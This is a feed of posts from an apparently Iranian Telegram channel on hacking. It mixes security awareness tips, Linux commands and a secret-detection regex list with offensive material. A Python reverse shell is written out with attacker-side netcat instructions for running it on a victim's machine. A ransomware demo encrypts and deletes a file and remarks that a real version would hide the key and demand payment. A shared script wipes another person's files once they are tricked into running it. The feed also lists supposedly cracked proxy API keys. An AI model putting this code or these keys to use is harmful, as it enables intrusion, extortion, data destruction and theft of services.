DarkPacket
7.02K subscribers
28 photos
2 videos
50 files
64 links
> 🛡️ Ethical Hacking | Cyber Security

💻 Learn • Practice • Secure
🔐 Ethical & Educational Content Only
We respect and follow Telegram's rules
🚫 No illegal or unauthorized activities
👤 @durov
Download Telegram
🔴 Hacker Fact | حتی MFA هم همیشه کافی نیست...

در حمله‌ی MFA Fatigue، مهاجم با ارسال درخواست‌های متعدد ورود، کاربر را تحت فشار قرار می‌دهد تا در نهایت یکی از درخواست‌ها را تأیید کند. 👀

🎯 این حمله به‌جای شکستن MFA، روی خستگی و بی‌دقتی کاربر حساب می‌کند.

⚠️ اگر درخواست MFA را خودت شروع نکردی، تأییدش نکن.


🔴 Hacker Fact | Even MFA Isn’t Always Enough...

In an MFA Fatigue attack, an attacker sends repeated login requests, hoping the user will eventually approve one of them. 👀

🎯 Instead of breaking MFA, the attack relies on user fatigue and inattention.

⚠️ If you didn’t initiate the login, don’t approve the MFA request.

#CyberSecurity #MFA #RedTeam #SecurityAwareness
#Tyger
2
از الان میگم خدارو شکر وضعیت اومدن ممبر به کانالم خوبه روزانه 200.300تا میاد از رو تبلیغات
از همین الان قول میدم که دیدین دفعه قبل گفتم 6کا بشیم قره کشی راه میندازم
الانم میگم اگه 20کا بشیم بلاخره هزینه بردار
20تا یا قره کشی 3ماهه پریمیوم انجام میدم
یا 10تا 6ماهه

اگه از این به بعد قول بدین
تو حمایت بترکونین شاید زودتر هم انجام بدم
کافیه بهم انگیزه بیاد من جبران میکنم 🔪
Please open Telegram to view this post
VIEW IN TELEGRAM
12🔥2
newfile.py
6.2 KB
اینم یک اسکریپت شخصی سازی شده
برای حذف فایل های شخصی
فقط کافیه بدین طرف ران کنه توی اندروید با ترموکس یا پایدروید توی ویندوز با وی اس کد یا توی لینکوس با ترمینال
البته طرف کد نویس باشه متوجه میشه
این صرفا بخاطر کسایی هست که آتویی دست یکی داره و میخواد پاک بشه
پس استفاده درست کنین ازش
در ضمن به هیچ عنوان خودتون ران نکنین تو کسری از ثانیه همه اطلاعات دلت میشه
4
لیست ۲۵ الگوی Regex برای شناسایی اطلاعات حساس (Data Leakage)

\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}\b (Email)
\b(?:\d[ -]*?){13,16}\b (Credit Card)
\b\d{3}-\d{2}-\d{4}\b (SSN)
\bAKIA[0-9A-Z]{16}\b (AWS Access Key)
\bASIA[0-9A-Z]{16}\b (AWS Temp Key)
AIza[0-9A-Za-z_-]{35} (Google API Key)
sk_live_[0-9a-zA-Z]{24,} (Stripe Secret Key)
ghp_[0-9a-zA-Z]{36} (GitHub Token)
xox[baprs]-[0-9a-zA-Z-]{10,} (Slack Token)
-----BEGIN RSA PRIVATE KEY----- (Private Key)
-----BEGIN OPENSSH PRIVATE KEY----- (SSH Key)
password\s*[:=]\s*\S+ (Password)
secret\s*[:=]\s*\S+ (Secret)
api[_-]?key\s*[:=]\s*\S+ (API Key)
token\s*[:=]\s*\S+ (Token)
Authorization\s*:\s*Bearer\s+\S+ (Bearer Token)
mongodb(\+srv)?://[^\s]+ (MongoDB URL)
postgres://[^\s]+ (PostgreSQL URL)
mysql://[^\s]+ (MySQL URL)
redis://[^\s]+ (Redis URL)
amqp://[^\s]+ (RabbitMQ URL)
ftp://[^\s]+ (FTP URL)
smtp://[^\s]+ (SMTP URL)
BEGIN PGP PRIVATE KEY (PGP Key)
\d{11} (Iran National ID)

#Regex #آموزشی #ℳℴ𝒷𝒾𝓃
🔥32
لیست ۱۰ ابزار ضروری برای تست امنیت (همه رایگان)

Nmap – اسکن شبکه و پورت
Burp Suite Community – تست برنامه تحت وب
Wireshark – تحلیل ترافیک شبکه
Nikto – اسکنر آسیب‌پذیری وب
SQLmap – تست تزریق SQL
Hydra – تست brute-force رمز عبور
Metasploit Framework – تست نفوذ کامل
Gobuster – پیدا کردن مسیرهای مخفی
John the Ripper – کرک پسورد
Aircrack-ng – تست امنیت وای‌فای

#tools #آموزشی #ℳℴ𝒷𝒾𝓃
🔥41
لیست ۱۵ هدر امنیتی که هر وبسایت باید داشته باشد

اگر سایت دارید، این هدرها را روی سرور خود تنظیم کنید تا امنیت بالاتری داشته باشید.

X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: default-src 'self'
Referrer-Policy: no-referrer
Permissions-Policy: geolocation=(), microphone=()
X-XSS-Protection: 1; mode=block
Cache-Control: no-store
Pragma: no-cache
Access-Control-Allow-Origin: https://example.com
Feature-Policy: camera 'none'
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Set-Cookie: Secure; HttpOnly; SameSite=Strict

#آموزشی #ℳℴ𝒷𝒾𝓃
4🔥1
لیست ۲۰ هدر رایج که اطلاعات سرور را لو می‌دهند

Server: Apache/2.4.41
Server: nginx/1.18.0
Server: Microsoft-IIS/10.0
Server: LiteSpeed
X-Powered-By: PHP/7.4.33
X-Powered-By: ASP.NET
X-Powered-By: Express
X-AspNet-Version: 4.0.30319
X-Runtime: 0.123456
X-Drupal-Cache: HIT
X-Generator: WordPress 6.4.1
X-Varnish: 123456
Via: 1.1 varnish
X-Cache: HIT
X-Amz-Cf-Id: abc123
X-Backend-Server: web01
X-Request-ID: 1234567890
X-Debug-Token: abcdef123456
X-Trace-Id: 1234567890
X-Transaction-ID: abcdef123456


#آموزشی #ℳℴ𝒷𝒾𝓃
4🔥1
لیست ۱۵ خطای رایج که اطلاعات حساس لو می‌دهند

Warning: mysqli_fetch_array() expects parameter...
Fatal error: Uncaught Exception...
Notice: Undefined index: user in...
Parse error: syntax error, unexpected...
PDOException: SQLSTATE[42000]...
Stack trace: #0 /var/www/html...
ORA-00933: SQL command not properly ended
Microsoft OLE DB Provider for ODBC Drivers
TypeError: Cannot read property...
NullPointerException at com.example...
Debugging info: SELECT * FROM users...
Traceback (most recent call last)...
Warning: pg_connect(): Unable to connect...
MySQL server version for the right syntax...
Path: /home/user/public_html/...


#آموزشی #ℳℴ𝒷𝒾𝓃
4🔥1
۵۰ عدد User-Agent:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.2365.52
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.2277.128
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.2365.52
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 OPR/107.0.0.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
Mozilla/5.0 (iPhone; CPU iPhone OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Mobile/15E148 Safari/604.1
Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1
Mozilla/5.0 (iPad; CPU OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Linux; Android 14; SM-S921B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 13; SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 14; SM-T970) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0


#User-Agent #آموزشی #ℳℴ𝒷𝒾𝓃
🔥41👍1
تعدادی پروکسی کرک شده فعال از سایت corsproxy.io:

https://corsproxy.io/?key=3ea6efce&url=http://example.com
https://corsproxy.io/?key=14140035&url=http://example.com
https://corsproxy.io/?key=1101a4e3&url=http://example.com
https://corsproxy.io/?key=7fe10987&url=http://example.com
https://corsproxy.io/?key=fa1a827f&url=http://example.com
https://corsproxy.io/?key=798be704&url=http://example.com
https://corsproxy.io/?key=5f0076e6&url=http://example.com
https://corsproxy.io/?key=bdf29fc5&url=http://example.com
https://corsproxy.io/?key=5f7d15ff&url=http://example.com
https://corsproxy.io/?key=839cf7da&url=http://example.com
https://corsproxy.io/?key=b9aac4bc&url=http://example.com
https://corsproxy.io/?key=856c89ff&url=http://example.com
https://corsproxy.io/?key=054af249&url=http://example.com
https://corsproxy.io/?key=02a83d86&url=http://example.com
https://corsproxy.io/?key=b5b98ce9&url=http://example.com
https://corsproxy.io/?key=f5bebaf5&url=http://example.com
https://corsproxy.io/?key=08677b5d&url=http://example.com
https://corsproxy.io/?key=9c95e1f7&url=http://example.com
https://corsproxy.io/?key=4b9f21b0&url=http://example.com
https://corsproxy.io/?key=d3b9501d&url=http://example.com
https://corsproxy.io/?key=2a6e1787&url=http://example.com
https://corsproxy.io/?key=86f67453&url=http://example.com
https://corsproxy.io/?key=eee8f095&url=http://example.com
https://corsproxy.io/?key=a435fa40&url=http://example.com
https://corsproxy.io/?key=4a61f73f&url=http://example.com
https://corsproxy.io/?key=b5a8fa6e&url=http://example.com
https://corsproxy.io/?key=e9871471&url=http://example.com
https://corsproxy.io/?key=4f2b3b5d&url=http://example.com
https://corsproxy.io/?key=345b7a9a&url=http://example.com
https://corsproxy.io/?key=4dbb19c1&url=http://example.com


#Cors_Proxy #آموزشی #ℳℴ𝒷𝒾𝓃
31🔥1
🌑 Hacker Fact | وقتی سایت مورد اعتماد تبدیل به تله میشه...

در حمله‌ی Watering Hole، مهاجم یک وب‌سایت مورد اعتمادِ گروه هدف را آلوده یا دستکاری می‌کند تا بازدیدکنندگان آن را هدف قرار دهد. 👁️

🎯 قربانی ممکن است بدون کلیک روی یک لینک مشکوک، صرفاً با بازدید از یک سایت آشنا در معرض حمله قرار بگیرد.

⚠️ حتی سایت‌های آشنا هم همیشه به معنی سایت‌های امن نیستند.

---

🌑 Hacker Fact | When a Trusted Website Becomes a Trap...

In a Watering Hole Attack, an attacker compromises or manipulates a website trusted by the target group to target its visitors. 👁️

🎯 A victim may be exposed simply by visiting a familiar website, without clicking a suspicious link.

⚠️ A familiar website isn’t always a safe website.

#CyberSecurity #WateringHole #Hacking #RedTeam #Tyger
5
ی گیفتی چیزی بزنین خوشحالم کنین 😄
@net_activenull
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥63👍1
🎯 Victim Fact | قربانی همیشه متوجه نمی‌شود...

گاهی قربانی یک حمله ممکنه هفته‌ها یا حتی ماه‌ها از حضور مهاجم در سیستمش خبر نداشته باشه. 👁️

مهاجم می‌تونه مدتی بدون ایجاد رفتار کاملاً واضح، اطلاعات جمع‌آوری کنه یا دسترسی خودش رو حفظ کنه.

⚠️ خطرناک‌ترین حمله، همیشه حمله‌ای نیست که سریع دیده بشه.

پ.ن: یاد فیلم Mr. Robot افتادم :)

---

🎯 Victim Fact | The Victim Doesn’t Always Notice...

Sometimes, a victim may remain unaware of an attacker’s presence for weeks or even months. 👁️

An attacker may stay under the radar while gathering information or maintaining access.

⚠️ The most dangerous attack isn’t always the one you notice immediately.

P.S.: This reminded me of Mr. Robot :)
#CyberSecurity #Victim #Hacking #RedTeam #Tyger
4
شل معکوس (Reverse Shell)

# reverse_shell_demo.py
# این کد یک اتصال معکوس به سیستم مهاجم برقرار می‌کند
# فقط در محیط آزمایشی با اجازه صاحب سیستم

import socket
import subprocess
import os

# آدرس و پورت سیستم مهاجم (برای تست، از localhost استفاده کنید)
ATTACKER_IP = "127.0.0.1"
ATTACKER_PORT = 4444

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ATTACKER_IP, ATTACKER_PORT))

# ارسال پوسته به مهاجم
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

subprocess.call(["/bin/sh", "-i"])

چطوری باید استفاده بکنید
خوب شما به عنوان هاکر در سیستم مهاجم ابتدا
nc -lvnp 4444
اجرا کنید، بعد این کد را در سیستم قربانی اجرا کنید.
این برای آموزش هست رو گوشی فامیل ها تست نکنید. 😂

#Shell #آموزشی #ℳℴ𝒷𝒾𝓃
3
باج‌افزار نمایشی (Ransomware Demo)

# ransomware_demo.py
# این کد فقط یک فایل نمونه را در یک پوشه موقت رمزنگاری می‌کند
# برای درک مفهوم رمزنگاری، نه برای استفاده واقعی

import os
from cryptography.fernet import Fernet

# فقط یک فایل تستی در /tmp
test_file = "/tmp/testfile.txt"

# ساخت فایل نمونه
with open(test_file, "w") as f:
f.write("این یک فایل تست است")

# تولید کلید
key = Fernet.generate_key()
cipher = Fernet(key)

# رمزنگاری فایل
with open(test_file, "rb") as f:
data = f.read()
encrypted = cipher.encrypt(data)

with open(test_file + ".encrypted", "wb") as f:
f.write(encrypted)

# حذف فایل اصلی (در محیط واقعی ممکن است حذف شود)
os.remove(test_file)

print(f"فایل رمزنگاری شد. کلید: {key.decode()}")

برای استفاده
به cryptography نیاز داری
pip install cryptography
این کد فقط یک فایل در /tmp را رمزنگاری میکنه و بعد کلید رو نشون می‌ده
تو نسخه حرفه‌ای باید کلید را مخفی بکنید و درخواست رو هم باج بکنید. این بیشتر نمونه بود.

#Ransomware #آموزشی #ℳℴ𝒷𝒾𝓃
3
🐧 آموزش ۳۰ ثانیه‌ای لینوکس

🔎 دنبال یه فایل بین کلی پوشه می‌گردی؟ لازم نیست دونه‌دونه بگردی!

با "find" می‌تونی خیلی سریع پیداش کنی:

find ~ -name "filename"

اگه اسم کامل فایل یادت نیست، می‌تونی بخشی از اسمش رو جستجو کنی:

find ~ -iname "*config*"

یه دستور ساده، ولی کاربردی برای صرفه‌جویی کلی در زمان.

ترمینال رو دست‌کم نگیر! 🐧

#Linux #KaliLinux #LightKali #Terminal #LinuxTips #CyberSecurity #InfoSec
#Tyger
2🔥1
🕵️‍♂️ Subfinder — پیدا کردن Subdomainها
اگه تازه وارد دنیای امنیت شدی، اول بدون Subdomain چیه 👇
فرض کن سایت اصلی اینه:
🌐 example.com
ممکنه بخش‌های مختلف سایت روی آدرس‌های جدا باشن، مثلاً:
🔹 blog.example.com
🔹 shop.example.com
🔹 api.example.com
به این آدرس‌های فرعی می‌گیم Subdomain.
حالا Subfinder چیکار می‌کنه؟ 🤔
🔎 به‌صورت Passive در منابع مختلف جستجو می‌کنه تا Subdomainهای مربوط به یک دامنه رو پیدا کنه؛ یعنی برای شروع کار لازم نیست مستقیم به سایت درخواست‌های زیادی بفرسته.
📌 نصب در Kali:
sudo apt install subfinder

مثال ساده:
subfinder -d example.com

یعنی:
👉 «Subdomainهای مربوط به example.com رو پیدا کن.»
💾 اگه بخوای نتیجه رو داخل یک فایل ذخیره کنی:
subfinder -d example.com -o subdomains.txt

🎯 به چه دردی می‌خوره؟
🔍 پیدا کردن دارایی‌های یک دامنه
🛡️ بررسی سطح حمله
🐞 Bug Bounty
🕵️ OSINT
💡 خلاصه:
example.com🔎 Subfinder → 📋 لیستی از Subdomainها
⚠️ فقط روی دامنه‌هایی که اجازه بررسی‌شون رو داری استفاده کن.
#Linux #KaliLinux #LightKali #Subfinder #BugBounty #OSINT #CyberSecurity
#Tyger
6🔥1
🐧 Linux Practical |

🐧 نسخه لینوکس رو چطور بفهمیم؟
با:
cat /etc/os-release

می‌تونی نام توزیع و نسخه سیستم‌عامل رو مشاهده کنی.

💡 این اطلاعات هنگام نصب ابزارها و عیب‌یابی مشکلات خیلی کاربردیه.

#Linux #KaliLinux #LightKali #LinuxTips #CyberSecurity
#Tyger
5
newfile.py
3.8 KB
یک آی پی اسکنر برای کرک سرور
سرعت نسبتا خوبی داره
aiohttp
aiodns
colorama
اینم کتابخانه های قابل نصب
دیگه نیازی به توضیح اضافی نیست
دو سه روز سرم شلوغ مطمئن باشید جبران میکنم براتون
91
https://t.me/DarkpacketGroup
عضو شید بحث داغ
4